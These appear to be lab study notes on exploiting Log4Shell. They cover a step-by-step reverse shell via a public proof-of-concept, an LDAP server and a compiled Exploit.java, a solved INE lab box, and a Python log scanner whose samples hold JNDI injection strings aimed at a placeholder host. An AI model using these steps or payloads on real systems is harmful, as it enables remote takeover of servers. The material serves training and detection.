Log4j Vulnerability (Log4Shell)
Vulnerability reported on 9/Dec/2021 in the Apache Java logging library Log4j.
Background:
1- A quick 3 min video to get what all the fuss is about, from Marcus Hutchins:
GOVCERT:
A more practical demonstration from Sophos:
Tut Notes:
Check if the server is vulnerable:
1- Start a server/listener:
2- Send a request to the potentially vulnerable point:
If you receive a connection (a response) in nc, then it's vulnerable.
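Defender side of the same check, as an added example (not part of the original notes): the probe request from step 2 carries a JNDI lookup string, so it shows up in web access logs. The log lines, IPs and the callback.example host below are constructed; nested lookups such as ${lower:j} are collapsed first because they hide the jndi keyword from plain string matching.

```python
import re
from urllib.parse import unquote

# Matches the start of a JNDI lookup once any nesting has been resolved.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Innermost lookup such as ${lower:j}, ${::-j} or ${env:X:-j}; group 1 is the
# literal it resolves or falls back to, which is how "jndi" is usually hidden.
NESTED = re.compile(r"\$\{[^${}]*?:-?([^${}:]*)\}")

def has_jndi_lookup(text, max_depth=8):
    """Return True if text contains a (possibly nested) ${jndi:...} lookup."""
    s = unquote(text)                      # undo %24%7B... URL encoding
    for _ in range(max_depth):
        if JNDI.search(s):
            return True
        collapsed = NESTED.sub(r"\1", s)   # peel one nesting level
        if collapsed == s:                 # nothing left to resolve
            return False
        s = collapsed
    return False

def scan(lines):
    """Return (line_number, client_ip) for every log line with a lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        if has_jndi_lookup(line):
            hits.append((n, line.split(" ", 1)[0]))
    return hits

# Constructed sample access-log lines (documentation IPs, placeholder host).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:09:14:02 +0000] "GET /index.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:09:15:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example/a}"',
    '203.0.113.9 - - [10/Dec/2021:09:15:44 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '203.0.113.23 - - [10/Dec/2021:09:16:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://callback.example/a}"',
    '198.51.100.7 - - [10/Dec/2021:09:17:30 +0000] "GET /price?cur=${USD} HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, ip in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI lookup from {ip}")
```

A hit only means a lookup string was sent; whether the host is vulnerable still depends on the Log4j version and configuration behind it.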
Exploiting the vulnerability using your own LDAP server:
We will be using the following script to automate it: https://github.com/kozmer/log4j-shell-poc
1- Set up an LDAP server so we can interpret the response:
#Exploit: is the name of the exploit we will create.
Inside poc.py there's the Java code (in a comment). Copy it to a new Exploit.java file, because this is the exploit, and fill in your:
String host="<attacker IP>";
int port = <nc_port>;
2- Compile the exploit:
-source: Java version
-target: JDK version
You will get 1 warning; don't worry about it.
3- Set up the server to host the exploit:
8080 because that's the port we set up our LDAP on.
4- Set up a listener to receive the connection from the target once it's exploited:
Same port as the one in Exploit.java.
5- Attack (send the request):
<ldap_port>: from step 1
No need to provide the extension; LDAP knows it by itself.
🎉Now nc has received a connection, and you have a reverse shell.🎉
You can spawn a bash shell:
And of course, you can upgrade to a meterpreter shell:
Solving INE Box:
target: demo.ine.local
My IP: 192.10.137.2
Footprinting:
Runs Apache Tomcat; by default it doesn't really depend on Log4j, but it can be configured to use it:
Apache JServ is interesting but not the target here; I know this version is vulnerable.
Checking for the vulnerability:
We got a response in nc, so it's vulnerable...😀
Time to exploit it:
my LDAP:
nc listener:
Compiling the Java Exploit (RevShell):
server Hosting the Exploit:
exploit:
Goal achieved: